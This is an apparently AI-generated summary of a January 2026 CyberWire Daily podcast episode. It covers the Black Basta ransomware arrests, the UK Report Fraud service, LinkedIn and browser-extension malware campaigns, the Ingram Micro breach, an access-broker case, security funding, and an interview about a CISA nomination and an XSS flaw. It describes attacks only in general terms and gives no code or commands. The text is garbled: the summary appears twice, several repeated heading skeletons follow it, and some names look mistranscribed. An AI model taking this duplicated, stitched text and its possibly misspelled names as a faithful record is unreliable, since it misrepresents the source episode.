CyberWire Daily — "Million-dollar hacks and a manhunt."

Date: January 20, 2026
Host: Dave Bittner (N2K Networks)
Guest: Tim Starks (CyberScoop)

Overview

This episode of CyberWire Daily provides a sweeping tour through the latest, most pressing cybersecurity threats and developments: a law enforcement crackdown on a major ransomware group, the launch of a national anti-fraud service in the UK, fresh research on evolving malware campaigns, a notable ransomware-related data breach, and insight on how access brokers fuel cybercrime. The show closes with a lively interview with Tim Starks of CyberScoop, covering the politics and security ironies surrounding high-level US cybersecurity appointments, plus a look at vulnerabilities in government-offered tools and the surprising cyber risks facing the funeral industry.

Key News Stories and Insights

1. Authorities Pursue Black Basta Ransomware Group

00:55–03:02

Who: Ukrainian and German authorities identify two Ukrainians as members, and put alleged Russian leader Oleg Nefedov on an international wanted list.
What: Hundreds of organizations extorted globally, with damages in the hundreds of millions. The two suspects focused on breaching networks and cracking stolen password hashes.
How: Digital devices and crypto seized; ongoing analysis. Structure and ties to Conti and Ryuk ransomware networks exposed by prior leaks.
Quote:

"Black Basta has operated since at least 2022, extorting hundreds of organizations worldwide and causing hundreds of millions of dollars in damage." – Dave Bittner (01:22)

2. UK’s ‘Report Fraud’ Service Targets Cybercrime

03:03–04:27

What’s new: City of London Police launch Report Fraud, replacing the criticized Action Fraud system.
Key features:
- National reporting portal
- Updates for victims whose reports contribute to investigations
- Real-time analytics for actionable intelligence
Why it matters: Fraud now makes up about half of UK crime and costs billions.
Quote:

"Report Fraud provides a single national reporting portal, promises follow up updates when reports contribute to investigations, and uses real time analytics to generate actionable intelligence." – Dave Bittner (03:37)

3. Targeted Malware via LinkedIn Private Messages

04:28–05:47

Findings (ReliaQuest): Sophisticated phishing campaign uses LinkedIn DMs, targeting execs and IT admins.
Method:
- Winrar SFX archive drops both PDF reader & malicious DLL (through DLL sideloading)
- Remote access trojan established using open-source penetration testing tools
Commentary: Calls for organizations to treat LinkedIn like email—train users for social media phishing.
Quote:

"The campaign highlights how social media remains an overlooked attack surface and urges organizations to apply email-level scrutiny training and controls to platforms like LinkedIn." – Dave Bittner (05:35)

4. NexShield: Malicious Browser Extension Crash Campaign

05:48–07:08

Discovery (Huntress): Extension masquerades as privacy ad blocker for Chrome/Edge, actually executes a 'crashfix' attack, causing persistent browser DoS.
Attack chain:
- On restart, prompts user to run faux security commands, triggering PowerShell infection
- Deploys Modelo Rat (Python RAT: recon, persistence, payloads)
- Attribution: Threat actor 'Kong Tuk'
Significance: Shows growing attacker interest in enterprise browser environments.

5. Ingram Micro Ransomware & Data Breach

07:09–08:03

Incident: Ransomware breach impacted 42,000 individuals (July 2025), affecting employment and applicant data.
Response: Notifications, credit monitoring, federal notifications.
Culprit: SafePay group claims (unverified) 3.5TB in stolen data.

6. Access Broker Sentenced for Corporate Credentials Sales

08:04–09:00

Subject: Jordanian national Faras Khali Ahmad Abashiti ("Riz") sold access to at least 50 organizations (May 2023).
Details: Credentials sold for cryptocurrency on cybercrime forum to undercover law enforcement.
Significance: Illustrates the crucial role of 'access brokers' in broader cybercrime.
Outcome: Sentencing set for May 2026.

7. Cybersecurity Investment & M&A Highlights

09:01–10:51

Investments: Seven deals, $350M+ total.
- Notables:
  - Torc (Israeli SOC/AI secops) — $140M Series D ($1.2B valuation)
  - Novi (AI pen-testing) — $51.5M total across seed, Series A, and debt rounds
Acquisitions:
- CrowdStrike acquires Seraphic (browser security, Israel) & Signal (US IAM provider) for $1.1B combined
Takeaway: Intense VC and strategic interest in AI-enhanced security and browser/IAM protection.

Interview: Tim Starks (CyberScoop)

8. Politics and Paradoxes in US Cyber Leadership

13:35–17:46

Sean Planky's Troubled CISA Nomination

Context:
- Planky is surprisingly renominated as CISA director after his initial nomination was stalled in the Senate.
- Main obstacles: Not his record, but Senate holds linked to disaster aid and Coast Guard contractor issues.
Key Quotes:

"It's a little surprising to me too, because pretty much his nomination was left for dead by basically everybody I knew." – Tim Starks (14:01)
"The White House has said...they are committed to him. Obviously renominating him suggests that." – Tim Starks (14:10) "The Republicans from North Carolina are holding him up over disaster aid... Rick Scott from Florida... held up his nomination over a Coast Guard contract for a contractor in his state that got partially canceled." – Tim Starks (15:09)
Planky's position: Planky says it’s outside his control:

"His response was kind of like not up to me. It's up to the White House." – Tim Starks (16:31)
Analysis: The process is gridlocked due to unrelated political fights, not candidate fitness.

Vulnerability Irony in CISA's Secure Software Tool

17:46–20:20

Story: Security researcher Jeff Williams found a trivial XSS vulnerability on CISA's secure software procurement tool.
Timeline: Vulnerability existed for months (September–December 2025) before patch.
Irony: Tool’s purpose is to guide secure software acquisition.
Quote:

“This was something that could have been fixed in five minutes and that it demonstrated that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
CISA response: Non-critical, fixed eventually. Said process worked; researcher feels it showed lack of diligence.
Humor:

“Everything’s perfect, as we know. All is well and it’s going to stay well.” – Tim Starks (20:14)

9. Cybercrime Hits Korean Funeral Sector—A Wake-Up Call

21:32–22:49

Incident: Ransomware attack hits Kyowon Group affiliates; exposes security vacuum in Korea's funeral industry.
Key Points:
- Firms aren’t required to get information security certification
- Industry holds personal data on ~10M subscribers
- Lawmakers flag need for regulation, as sector is highly vulnerable
Takeaway: Even “traditional” sectors with substantial data and funds are prime cybercrime targets.
Comment:

"The funeral industry's security posture appears to be built more on tradition than on modern safeguards." – Dave Bittner (21:40)

Memorable Quotes & Moments

On political wrangling:

"Why renominate him if you’re not going to do everything you can to get him through?" – Tim Starks (17:41)
On basic security failings:

“This was something that could have been fixed in five minutes... that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
On industry vulnerabilities:

"Ransomware groups favor exactly this combination: steady cash flow, sensitive data, and thin defenses." – Dave Bittner (22:21)

Timestamps

00:55 — Black Basta ransomware manhunt
03:03 — Launch of 'Report Fraud' in the UK
04:28 — LinkedIn RAT phishing campaign
05:48 — Malicious browser extension (NexShield) campaign
07:09 — Ingram Micro ransomware and breach
08:04 — Access broker conviction
09:01 — VC funding and M&A headlines
13:35 — Tim Starks interview begins
14:01 — The mystery of Sean Planky’s renomination
18:00 — CISA tool’s ironic vulnerability
21:32 — Ransomware in the funeral industry

Tone and Style

The episode blends concise newsworthiness with wry emphasis on the paradoxes and paradoxical ironies of cybersecurity—both in government bungles and overlooked industry targets. Accessible yet sharply insightful, with both technical and strategic dimensions.

For full details and continuing coverage, visit thecyberwire.com.

CyberWire Daily — "Million-dollar hacks and a manhunt."

Date: January 20, 2026
Host: Dave Bittner (N2K Networks)
Guest: Tim Starks (CyberScoop)

Overview

Key News Stories and Insights

1. Authorities Pursue Black Basta Ransomware Group

00:55–03:02

Who: Ukrainian and German authorities identify two Ukrainians as members, and put alleged Russian leader Oleg Nefedov on an international wanted list.
What: Hundreds of organizations extorted globally, with damages in the hundreds of millions. The two suspects focused on breaching networks and cracking stolen password hashes.
How: Digital devices and crypto seized; ongoing analysis. Structure and ties to Conti and Ryuk ransomware networks exposed by prior leaks.
Quote:

"Black Basta has operated since at least 2022, extorting hundreds of organizations worldwide and causing hundreds of millions of dollars in damage." – Dave Bittner (01:22)

2. UK’s ‘Report Fraud’ Service Targets Cybercrime

03:03–04:27

What’s new: City of London Police launch Report Fraud, replacing the criticized Action Fraud system.
Key features:
- National reporting portal
- Updates for victims whose reports contribute to investigations
- Real-time analytics for actionable intelligence
Why it matters: Fraud now makes up about half of UK crime and costs billions.
Quote:

"Report Fraud provides a single national reporting portal, promises follow up updates when reports contribute to investigations, and uses real time analytics to generate actionable intelligence." – Dave Bittner (03:37)

3. Targeted Malware via LinkedIn Private Messages

04:28–05:47

Findings (ReliaQuest): Sophisticated phishing campaign uses LinkedIn DMs, targeting execs and IT admins.
Method:
- Winrar SFX archive drops both PDF reader & malicious DLL (through DLL sideloading)
- Remote access trojan established using open-source penetration testing tools
Commentary: Calls for organizations to treat LinkedIn like email—train users for social media phishing.
Quote:

"The campaign highlights how social media remains an overlooked attack surface and urges organizations to apply email-level scrutiny training and controls to platforms like LinkedIn." – Dave Bittner (05:35)

4. NexShield: Malicious Browser Extension Crash Campaign

05:48–07:08

Discovery (Huntress): Extension masquerades as privacy ad blocker for Chrome/Edge, actually executes a 'crashfix' attack, causing persistent browser DoS.
Attack chain:
- On restart, prompts user to run faux security commands, triggering PowerShell infection
- Deploys Modelo Rat (Python RAT: recon, persistence, payloads)
- Attribution: Threat actor 'Kong Tuk'
Significance: Shows growing attacker interest in enterprise browser environments.

5. Ingram Micro Ransomware & Data Breach

07:09–08:03

Incident: Ransomware breach impacted 42,000 individuals (July 2025), affecting employment and applicant data.
Response: Notifications, credit monitoring, federal notifications.
Culprit: SafePay group claims (unverified) 3.5TB in stolen data.

6. Access Broker Sentenced for Corporate Credentials Sales

08:04–09:00

Subject: Jordanian national Faras Khali Ahmad Abashiti ("Riz") sold access to at least 50 organizations (May 2023).
Details: Credentials sold for cryptocurrency on cybercrime forum to undercover law enforcement.
Significance: Illustrates the crucial role of 'access brokers' in broader cybercrime.
Outcome: Sentencing set for May 2026.

7. Cybersecurity Investment & M&A Highlights

09:01–10:51

Investments: Seven deals, $350M+ total.
- Notables:
  - Torc (Israeli SOC/AI secops) — $140M Series D ($1.2B valuation)
  - Novi (AI pen-testing) — $51.5M total across seed, Series A, and debt rounds
Acquisitions:
- CrowdStrike acquires Seraphic (browser security, Israel) & Signal (US IAM provider) for $1.1B combined
Takeaway: Intense VC and strategic interest in AI-enhanced security and browser/IAM protection.

Interview: Tim Starks (CyberScoop)

8. Politics and Paradoxes in US Cyber Leadership

13:35–17:46

Sean Planky's Troubled CISA Nomination

Context:
- Planky is surprisingly renominated as CISA director after his initial nomination was stalled in the Senate.
- Main obstacles: Not his record, but Senate holds linked to disaster aid and Coast Guard contractor issues.
Key Quotes:

"It's a little surprising to me too, because pretty much his nomination was left for dead by basically everybody I knew." – Tim Starks (14:01)
"The White House has said...they are committed to him. Obviously renominating him suggests that." – Tim Starks (14:10) "The Republicans from North Carolina are holding him up over disaster aid... Rick Scott from Florida... held up his nomination over a Coast Guard contract for a contractor in his state that got partially canceled." – Tim Starks (15:09)
Planky's position: Planky says it’s outside his control:

"His response was kind of like not up to me. It's up to the White House." – Tim Starks (16:31)
Analysis: The process is gridlocked due to unrelated political fights, not candidate fitness.

Vulnerability Irony in CISA's Secure Software Tool

17:46–20:20

Story: Security researcher Jeff Williams found a trivial XSS vulnerability on CISA's secure software procurement tool.
Timeline: Vulnerability existed for months (September–December 2025) before patch.
Irony: Tool’s purpose is to guide secure software acquisition.
Quote:

“This was something that could have been fixed in five minutes and that it demonstrated that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
CISA response: Non-critical, fixed eventually. Said process worked; researcher feels it showed lack of diligence.
Humor:

“Everything’s perfect, as we know. All is well and it’s going to stay well.” – Tim Starks (20:14)

9. Cybercrime Hits Korean Funeral Sector—A Wake-Up Call

21:32–22:49

Incident: Ransomware attack hits Kyowon Group affiliates; exposes security vacuum in Korea's funeral industry.
Key Points:
- Firms aren’t required to get information security certification
- Industry holds personal data on ~10M subscribers
- Lawmakers flag need for regulation, as sector is highly vulnerable
Takeaway: Even “traditional” sectors with substantial data and funds are prime cybercrime targets.
Comment:

"The funeral industry's security posture appears to be built more on tradition than on modern safeguards." – Dave Bittner (21:40)

Memorable Quotes & Moments

On political wrangling:

"Why renominate him if you’re not going to do everything you can to get him through?" – Tim Starks (17:41)
On basic security failings:

“This was something that could have been fixed in five minutes... that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
On industry vulnerabilities:

"Ransomware groups favor exactly this combination: steady cash flow, sensitive data, and thin defenses." – Dave Bittner (22:21)

Timestamps

00:55 — Black Basta ransomware manhunt
03:03 — Launch of 'Report Fraud' in the UK
04:28 — LinkedIn RAT phishing campaign
05:48 — Malicious browser extension (NexShield) campaign
07:09 — Ingram Micro ransomware and breach
08:04 — Access broker conviction
09:01 — VC funding and M&A headlines
13:35 — Tim Starks interview begins
14:01 — The mystery of Sean Planky’s renomination
18:00 — CISA tool’s ironic vulnerability
21:32 — Ransomware in the funeral industry

Tone and Style

For full details and continuing coverage, visit thecyberwire.com.

Million-dollar hacks and a manhunt.

Powered by Wave AI

Summary

CyberWire Daily — "Million-dollar hacks and a manhunt."

Overview

Key News Stories and Insights

1. Authorities Pursue Black Basta Ransomware Group

2. UK’s ‘Report Fraud’ Service Targets Cybercrime

3. Targeted Malware via LinkedIn Private Messages

4. NexShield: Malicious Browser Extension Crash Campaign

5. Ingram Micro Ransomware & Data Breach

6. Access Broker Sentenced for Corporate Credentials Sales

7. Cybersecurity Investment & M&A Highlights

Interview: Tim Starks (CyberScoop)

8. Politics and Paradoxes in US Cyber Leadership

Sean Planky's Troubled CISA Nomination

Vulnerability Irony in CISA's Secure Software Tool

9. Cybercrime Hits Korean Funeral Sector—A Wake-Up Call

Memorable Quotes & Moments

Timestamps

Tone and Style

Summary

CyberWire Daily — "Million-dollar hacks and a manhunt."

Overview

Key News Stories and Insights

1. Authorities Pursue Black Basta Ransomware Group

2. UK’s ‘Report Fraud’ Service Targets Cybercrime

3. Targeted Malware via LinkedIn Private Messages

4. NexShield: Malicious Browser Extension Crash Campaign

5. Ingram Micro Ransomware & Data Breach

6. Access Broker Sentenced for Corporate Credentials Sales

7. Cybersecurity Investment & M&A Highlights

Interview: Tim Starks (CyberScoop)

8. Politics and Paradoxes in US Cyber Leadership

Sean Planky's Troubled CISA Nomination

Vulnerability Irony in CISA's Secure Software Tool

9. Cybercrime Hits Korean Funeral Sector—A Wake-Up Call

Memorable Quotes & Moments

Timestamps

Tone and Style